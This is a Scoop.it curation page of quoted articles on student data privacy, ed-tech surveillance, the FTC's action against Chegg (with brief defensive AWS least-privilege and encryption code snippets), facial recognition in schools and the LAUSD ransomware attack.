  • Transparency regarding data practices with foreign adversaries: ADPPA requires entities to include provisions in their privacy policies disclosing whether any data collected by the entity is transferred to, processed in, stored in, or otherwise accessible to China, Russia, Iran, or North Korea. This means that any app using a Chinese cloud provider, which would have data access and disclosure obligations to the Chinese government similar to those raising concern about TikTok, would have to disclose that connection.  

Simply forcing a ban or divestiture on TikTok in the U.S. without broader privacy rules will not solve the core national security concerns of data collection and exploitation by foreign governments nor will it do anything to change the data collection practices by the millions of other apps whose business practices pose similar national security issues. The lack of a U.S. privacy law means that the Chinese government can purchase a vast array of Americans’ personal data, either from the new owners of TikTok or from any one of the U.S. companies collecting and selling the same data points from users. These concerns would be more effectively addressed by the passage of a strong, comprehensive U.S. privacy law."  

 

For original post, please visit:

https://epic.org/tiktok-is-not-the-only-problem/ 

No comment yet.
Rescooped by Roxana Marachi, PhD from Social Impact Bonds, "Pay For Success," Results-Based Contracting, and Blockchain Digital Identity Systems
July 22, 2023 9:05 PM
Scoop.it!

On Impact Investing, Digital Identity and the United Nation's Sustainable Development Goals // WrenchInTheGears

By Alison McDowell, wrenchinthegears.com 
"This is a presentation prepared for One Ocean, Many Waves Cross-movement Summit on the occasion of the 2020 UN Conference on the Status of Women, which was cancelled due to the pandemic, and thus presented online instead. The topic is the ways in which the Sustainable Development Goals underpin predatory "pay for success" human capital investment markets."

 

https://www.youtube.com/watch?v=QqFTyYhfNQs 

No comment yet.
Scooped by Roxana Marachi, PhD
February 10, 2023 5:23 PM
Scoop.it!

ChatGPT is a data privacy nightmare. If you’ve ever posted online, you ought to be concerned // The Conversation 

ChatGPT is a data privacy nightmare. If you’ve ever posted online, you ought to be concerned // The Conversation  | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

"ChatGPT is fueled by our intimate online histories. It’s trained on 300 billion words, yet users have no way of knowing which of their data it contains."...

 

For full post, please visit:

https://theconversation.com/chatgpt-is-a-data-privacy-nightmare-if-youve-ever-posted-online-you-ought-to-be-concerned-199283 

No comment yet.
Scooped by Roxana Marachi, PhD
July 24, 2022 12:06 PM
Scoop.it!

Killer Apps for the Classroom? Developing Critical Perspectives on ClassDojo and the ‘Ed-tech’ Industry // Williamson, B. (2019). Journal of Professional Learning 

Killer Apps for the Classroom? Developing Critical Perspectives on ClassDojo and the ‘Ed-tech’ Industry // Williamson, B. (2019). Journal of Professional Learning  | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Ben Williamson

" The digital behaviour-monitoring app ClassDojo has become one of the most popular educational technologies in the world. Widely adopted by teachers of young children in Australia, Europe and North America since its initial launch in 2011, ClassDojo is now attracting critical attention from researchers and the media too. These critical perspectives are importantly illuminating how popular classroom technologies such as ClassDojo and the wider ‘ed-tech’ market are involved in reshaping the purposes and practices of education at an international scale. They are global, networked, demanding of teachers’ labour, and based on the extraction of digital information from schools—all raising significant questions for critical interrogation.

The purpose of engaging with ClassDojo critically is to challenge some of the taken-for-granted assumptions used to justify and promote the rollout and uptake of new edtech products and services in classrooms. Being critical does not necessarily imply militant judgement, but instead careful inquiry into the origins, purposes and implications of new technologies, their links to education policies, and the practices they shape in schools. What do these new technologies ultimately mean for education looking to the future?

Much contemporary education policy and practice tends to be fixated on research that solves problems and offers evidence of ‘what works’ (Biesta, Filippakou, Wainwright & Aldridge, 2019). One of the most important aims of educational research, however, is to identify problems:

Educational research that operates in a problem‐posing rather than a problem‐solving mode is … itself a form of education as it tries to change mindsets and common perceptions, tries to expose hidden assumptions, and tries to engage in ongoing conversations about what is valuable and worthwhile in education and society more generally. (Biesta et al, 2019, p.3)... 

For full publication, please visit:

https://cpl.asn.au/print/3498 

No comment yet.
Scooped by Roxana Marachi, PhD
July 11, 2022 5:45 PM
Scoop.it!

Why We Need to Bust Some Myths about AI // Leufer (2020) // Cell Press

https://www.cell.com/patterns/pdf/S2666-3899(20)30165-3.pdf 

No comment yet.
Scooped by Roxana Marachi, PhD
November 1, 2022 4:05 PM
Scoop.it!

FTC Accuses Chegg Homework Help App of ‘Careless’ Data Security // The New York Times

FTC Accuses Chegg Homework Help App of ‘Careless’ Data Security // The New York Times | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Natasha Singer

"The Federal Trade Commission on Monday cracked down on Chegg, an education technology firm based in Santa Clara, Calif., saying the company’s “careless” approach to cybersecurity had exposed the personal details of tens of millions of users.

 

In a legal complaint, filed on Monday morning, regulators accused Chegg of numerous data security lapses dating to 2017. Among other problems, the agency said, Chegg had issued root login credentials, essentially an all-access pass to certain databases, to multiple employees and outside contractors. Those credentials enabled many people to look at user account data, which the company kept on Amazon Web Services’ online storage system.
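
For context on why shared root credentials are considered such a lapse: the least-privilege model that cloud providers recommend gives each employee or contractor only the narrow access their role requires, so one leaked credential cannot open every database. The sketch below is a hedged illustration using AWS's boto3 library in Python; the bucket, prefix, policy name, and user name are hypothetical, and nothing here describes Chegg's actual configuration:

import json
import boto3

iam = boto3.client("iam")

# A policy granting read-only access to a single prefix of one bucket,
# rather than an all-access pass to every database.
policy_doc = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["s3:GetObject"],
        "Resource": "arn:aws:s3:::example-app-data/reports/*",  # hypothetical bucket/prefix
    }],
}

resp = iam.create_policy(
    PolicyName="reports-read-only",  # hypothetical policy name
    PolicyDocument=json.dumps(policy_doc),
)

# Attach the scoped policy to one named user instead of sharing root keys.
iam.attach_user_policy(
    UserName="analyst-jane",  # hypothetical user
    PolicyArn=resp["Policy"]["Arn"],
)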

 

As a result, the agency said, a former Chegg contractor was able to use company-issued credentials to steal the names, email addresses and passwords of about 40 million users in 2018. In certain cases, sensitive details on students’ religion, sexual orientation, disabilities and parents’ income were also taken. Some of the data was later found for sale online.

 

Chegg’s popular homework help app is used regularly by millions of high school and college students. To settle the F.T.C.’s charges, the agency said Chegg had agreed to adopt a comprehensive data security program.

 

In a statement, Chegg said data privacy was a top priority for the firm and that the company had worked with the F.T.C. to reach a settlement agreement. The company said it currently has robust security practices, and that the incidents described in the agency’s complaint had occurred more than two years ago. Only a small percentage of users had provided data on their religion and sexual orientation as part of a college scholarship finder feature, the company said in the statement.

“Chegg is wholly committed to safeguarding users’ data and has worked with reputable privacy organizations to improve our security measures and will continue our efforts,” the statement said.

 

The F.T.C.’s enforcement action against Chegg, a prominent industry player, amounts to a warning to the U.S. education technology industry.

 

Since the early days of the pandemic in 2020, the education technology sector has enjoyed a surge in customers and revenue. To enable remote learning, many schools and universities rushed to adopt digital tools like exam-proctoring software, course management platforms and video meeting systems.

 
Students and their families, too, turned in droves to online tutoring services and study aids like math apps. Among them, Chegg, which had a market capitalization of $2.7 billion at the end of trading on Monday, reported annual revenues of $776 million for 2021, an increase of 20 percent from the previous year.
 

Some online learning systems proved so useful that many students, and their educational institutions, continued to use the tools even after schools and colleges returned to in-person teaching.

But the fast growth of digital learning tools during the pandemic also exposed widespread flaws.

 

Many online education services record, store and analyze a trove of data on students’ every keystroke, swipe and click — information that can include sensitive details on children’s learning challenges or precise locations. Privacy and security experts have warned that such escalating surveillance may benefit companies more than students.

In March, Illuminate Education, a leading provider of student-tracking software, reported a cyberattack on certain company databases. The incident exposed the personal information of more than a million current and former students across dozens of districts in the United States — including New York City, the nation’s largest public school system.


In May, the F.T.C. issued a policy statement saying that it planned to crack down on ed tech companies that collected excessive personal details from schoolchildren or failed to secure students’ personal information.


The F.T.C. has a long history of fining companies for violating children’s privacy on services like YouTube and TikTok. The agency is able to do so under a federal law, the Children’s Online Privacy Protection Act, which requires online services aimed at children under 13 to safeguard youngsters’ personal data and obtain parental permission before collecting it.


But the federal complaint against Chegg represents the first case under the agency’s new campaign focused specifically on policing the ed-tech industry and protecting student privacy. In the Chegg case, the homework help platform is not aimed at children, and the F.T.C. did not invoke the children’s privacy law. The agency accused the company of unfair and deceptive business practices.

Chegg was founded in 2005 as a textbook rental service for college students. Today it is an online learning giant that rents e-textbooks.

 

But it is most known as a homework help platform where, for $15.95 per month, students can find ready answers to millions of questions on course topics like relativity or mitosis. Students may also ask Chegg’s online experts to answer specific study or test questions they have been assigned.

Teachers have complained that the service has enabled widespread cheating. Students even have a nickname for copying answers from the platform: “chegging.”

Chegg’s privacy policy promised users that the company would take “commercially reasonable security measures to protect” their personal information. Chegg’s scholarship finder service, for instance, collected information like students’ birth dates as well as details on their religion, sexual orientation and disabilities, the F.T.C. said.

 

But regulators said the company failed to use reasonable security measures to protect user data, even after a series of security lapses that enabled intruders to gain access to sensitive student data and employees’ financial information.

As part of the consent agreement proposed by the F.T.C., Chegg must provide security training to employees and encrypt user data. Chegg must also give consumers access to the personal information it has collected about them — including any precise location data or persistent identifiers like IP addresses — and enable users to delete their records.
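
Encrypting user data at rest, as the proposed order requires, generally means sensitive fields are stored only as ciphertext, so a copied database is unreadable without a separately managed key. A minimal sketch of the idea, assuming Python's widely used cryptography library (illustrative only; the order does not prescribe any particular scheme):

from cryptography.fernet import Fernet

# In production the key would live in a key-management service,
# never alongside the data it protects.
key = Fernet.generate_key()
f = Fernet(key)

# Encrypt a sensitive field before it is written to storage...
token = f.encrypt(b"scholarship_profile: religion, orientation")  # illustrative record

# ...and decrypt only at the moment an authorized read needs it.
plaintext = f.decrypt(token)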

Other online learning services may also hear from regulators. The F.T.C. disclosed in July that it was pursuing a number of nonpublic investigations into ed tech providers.

“Chegg took shortcuts with millions of students’ sensitive information,” Samuel Levine, the director of the agency’s Bureau of Consumer Protection, said in a news release on Monday. “The commission will continue to act aggressively to protect personal data.”

 

Natasha Singer is a business reporter covering health technology, education technology and consumer privacy. @natashanyt"

 

For original article, please visit: 

https://www.nytimes.com/2022/10/31/business/ftc-chegg-data-security-legal-complaint.html 

No comment yet.
Scooped by Roxana Marachi, PhD
October 29, 2022 1:39 PM
Scoop.it!

Commentary: Keep facial recognition out of New York schools // Arya and Loshkajian (2022), Times Union 

Commentary: Keep facial recognition out of New York schools // Arya and Loshkajian (2022), Times Union  | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

By Mahima Arya and Nina Loshkajian

"In 2020, New York became a national civil rights leader, the first state in the country to ban facial recognition in schools. But almost two years later, state officials are examining whether to reverse course and give a passing grade to this failing technology.

Wasting money on biased and faulty tech will only make schools a harsher, more dangerous environment for students, particularly students of color, LGBTQ+ students, immigrant students, and students with disabilities. Preserving the statewide moratorium on biometric surveillance in schools will protect our kids from racially biased, ineffective, unsecure and dangerous tech.

 

Biometric surveillance depends on artificial intelligence, and human bias infects AI systems. Facial recognition software programmed to only recognize two genders will leave transgender and nonbinary individuals invisible. A security camera that learns who is “suspicious looking” using pictures of inmates will replicate the systemic racism that results in the mass incarceration of Black and brown men. Facial recognition systems may be up to 99 percent accurate on white men, but can be wrong more than one in three times for some women of color.

 
 

What’s worse, facial recognition technology has even higher inaccuracy rates when used on students. Voice recognition software, another widely known biometric surveillance tool, echoes this pattern of poor accuracy for those who are nonwhite, non-male, or young.

The data collected by biometric surveillance technologies is vulnerable to a variety of security threats, including hacking, data breaches and insider attacks. This data – which includes scans of facial features, fingerprints, and irises – is unique and highly sensitive, making it a valuable target for hackers and, once compromised, impossible to reissue like you would a password or PIN. Collecting and storing biometric data in schools, which tend to have inadequate cybersecurity practices, puts children at great risk of being tracked and targeted by malicious actors. There is absolutely no need to expose children to these privacy and safety risks.

 

The types of biometric surveillance technology being marketed to schools are widely recognized as dangerous. One particularly controversial vendor of facial recognition technology, Clearview AI, has reportedly tested or implemented its systems in more than 50 educational institutions across 24 states. Other countries have started to appreciate the threat Clearview poses to privacy, with Australia recently ordering it to cease its scraping of images. And last year, privacy groups in Austria, France, Greece, Italy and the U.K. filed legal complaints against Clearview. All while the company continues to market its products to schools in the U.S.

 

As the world begins to wake up to the risks of using facial recognition, New York should not make the mistake of allowing young kids to be subjected to its harms. Additionally, one study found that CCTV systems in U.K. secondary schools led many students to suppress their expressions of individuality and alter their behavior. Normalizing biometric surveillance will bring about a bleak future for kids at schools across the country.

New York shouldn’t waste money on tech that criminalizes and harms young people. Most school shootings are committed by current students or alumni of the school in question, whose faces would not be flagged as suspicious by facial recognition systems. And even if the technology were to flag a real potential perpetrator of violence, given the speed at which most school shootings usually come to an end, it is unlikely that law enforcement would be notified and able to arrive at the scene in time to prevent such horrendous acts.

Students, parents and stakeholders have the opportunity to submit a brief survey to let the State Education Department know that they want facial recognition and other biased AI out of their schools, not just temporarily but permanently. New York must at least extend the moratorium on biometric surveillance in schools, and ultimately should put an end to the use of such problematic technology altogether."


Mahima Arya is a computer science fellow at the Surveillance Technology Oversight Project (S.T.O.P.), a human rights fellow at Humanity in Action, and a graduate of Carnegie Mellon University. Nina Loshkajian is a D.A.T.A. Law Fellow at S.T.O.P. and a graduate of New York University School of Law.

 

https://www.timesunion.com/opinion/article/Commentary-Keep-facial-recognition-out-of-New-17523857.php 

No comment yet.
Scooped by Roxana Marachi, PhD
September 6, 2022 9:21 PM
Scoop.it!

Los Angeles Unified, Feds Investigating As Ransomware Attack Cripples IT Systems //  THE Journal 

Los Angeles Unified, Feds Investigating As Ransomware Attack Cripples IT Systems //  THE Journal  | Educational Psychology, AI, & Emerging Technologies: Critical Thinking on Current Trends | Scoop.it

"A ransomware attack over Labor Day weekend brought to a standstill the online systems of Los Angeles Unified School District, the second-largest K–12 district in the country with about 640,000 students, LAUSD officials confirmed this morning in a statement on its website.""

 

https://thejournal.com/articles/2022/09/06/los-angeles-unified-feds-investigating-as-ransomware-attack-cripples-it-systems.aspx?s=the_nu_060922&oly_enc_id=8831J2755401H5M 

No comment yet.